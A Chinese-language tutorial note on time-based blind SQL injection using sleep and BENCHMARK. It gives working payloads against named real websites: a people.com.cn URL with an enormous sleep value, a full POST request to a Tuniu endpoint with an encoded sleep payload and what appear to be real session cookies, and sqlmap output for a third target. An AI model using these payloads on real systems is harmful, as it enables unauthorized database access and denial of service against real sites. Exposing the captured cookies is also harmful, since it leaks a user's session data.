sleep 延迟注入

A: 时间差注入也叫延迟注入，是一种盲注的手法 提交对执行时间铭感的函数sql语句，通过执行时间的长短来判断是否执行成功，比如:正确的话会导致时间很长，错误的话会导致执行时间很短，这就是所谓的高级盲注。
利用BENCHMARK sleep 函数来注入
利用sleep也可以引起拒绝服务

B:

有时候当我们注入某站时，某站突然就打不开了，

被防火墙暂时隔离，你没法浏览他的页面，这时候你不得不换换IP,或者等待恢复，

或者提交注入参数的时候，网站的某种保护措施，他会跳转某个错误页面，访问N次错误页面的时候，才会正常访问。

这样就会影响咱们的效率,这就是为什么延时注入也算一节课的原因，还是蛮重要的.

C:

途牛主站延时注入+waf绕过

http://www.2cto.com/Article/201502/377118.html

eg.1

http://wap.people.com.cn/newsView.php?sid=&cnid=1456639 and sleep(99999999999)&chid=1_14_3&coid=1_14_3_1&wv=2&v=l&return=c

eg.2

POST /main.php?do=online_book_do_visitor HTTP/1.1
Host: km.tuniu.com
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://km.tuniu.com/main.php?do=online_book_visitor&order_id=4550094
Content-Length: 285
Cookie: p_phone_400=4007-999-999; PHPSESSID=8v1dgvcbbm0elnoprf91chnfv7; tuniu_channel=MTAwLDAsZDdiY2U0NTViYjViMDFhNWExYzk1YTM2ZjZiNDEyY2Q%3D; tuniuuser_citycode=MzMwMg%3D%3D; s_cc=true; s_nr=1421595835812; s_sq=%5B%5BB%5D%5D; __utma=1.151979505.1421595199.1421595199.1421595199.1; __utmb=1.170.9.1421599758357; __utmc=1; __utmz=1.1421595199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _tacau=MCxmMWJlYWNiMS03N2M1LTQ0ZjEtOThlMC0wYzc5ZWE2ZTRjMmQs; _tact=Y2UyNzU5NmMtMDIxNS0yMjFjLTgzYjItMDgxODUyOTM0ODVm; _tacz2=taccsr%3D%28direct%29%7Ctacccn%3D%28none%29%7Ctaccmd%3D%28none%29%7Ctaccct%3D%28none%29%7Ctaccrt%3D%28none%29; _taca=1421595199130.1421595199130.1421595199130.1; _tacb=NGYzNDkyNWMtY2ZlNi05MmJjLTA4MDAtOTgxMmFlYjRlZTkx; _tacc=1; tuniuuser_ip_citycode=MjAw; tuniuuser=NzczODQ4Niw2ODIzNjEzODU5LDY4MjM2MTM4NTkmcXVvdDsmYW1wO2d0O3M7JiMwMzk7LDAsMTQyMTU5NTQzMiw5ZjY0OTg2YzdkYzE0NzM0ZDEwZGFiZjM2NWYyMDBlOQ%3D%3D; tuniusub=1; tuniuuser_p_w_picpath=aHR0cDovL20udHVuaXVjZG4uY29tL2ZpbGVicm9rZXIvY2RuL3ByZC83NS8wYy83NTBjMmRhYmFhZjRmYjY4ZjI2NzVlM2NlZjA1YmM2ZC5wbmc%3D; tuniuuser_vip=MA%3D%3D; tuniuuser_level=MA%3D%3D; tuniuuser_id=7738486; tuniuuser_name=NjgyMzYxMzg1OSZxdW90OyZhbXA7Z3Q7czsmIzAzOTs%3D; Hm_lvt_dbdbb8d9c6cd72876c254897549e524b=1421503111,1421591375,1421594808,1421595437; Hm_lpvt_dbdbb8d9c6cd72876c254897549e524b=1421597431; tuniu_app_cc=list_three_days; tuniu_zeus=MzNfMV8yXzFfMV83OjpodHRwOi8vd3d3LnR1bml1LmNvbS9zdGF0aWMveW91amkvOjoyMDE1LTAxLTE4IDIzOjM5OjE0%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly90b3AudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0NTozMA%3D%3D%2CMTFfMl8xXzJfNV8xOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTggMjM6NDY6MDg%3D%2CMV8xXzFfMl8xXzE6Omh0dHA6Ly93d3cudHVuaXUuY29tLzo6MjAxNS0wMS0xOCAyMzo0ODozNQ%3D%3D%2CMTJfMl8xXzFfMl8zOjpodHRwOi8vd3d3LnR1bml1LmNvbS86OjIwMTUtMDEtMTkgMDA6NDk6MTg%3D; visit_history=5186662%2C780023%2C; _um_uuid=f7a45f3da941376f5abce7a65b613f27; __ozlvd1940=1421602934; tuniu_is_login=MQ%3D%3D; tuniu_newer=set_one_day; Hm_lvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421253828,1421597324; Hm_lpvt_44f54d76a67ba9230a7bb92d5ed5e4ba=1421597366; appdown=1; TUNIUmuser=1c80b2cffeddb233b6a4fbfddb375c15; tuniu_partner=MTAxLDAsLDlmZDgyZThjYTZkNGMwMTlmZTUyNzdlYjJmNTcxYzQ1; pgv_pvi=3638345589; pgv_info=ssi=s4790786375; tel_400=4007996820; PageSwitch=2%2C1429375904; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

visitor_info=123,33071919680425367s1l'+and+sleep%252811%2529+and+'1,1,1968-04-25,

eg.3

Place: GET

Parameter: appid

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: appid=330051' AND SLEEP(5) AND 'xRsl'='xRsl&host=admin5.com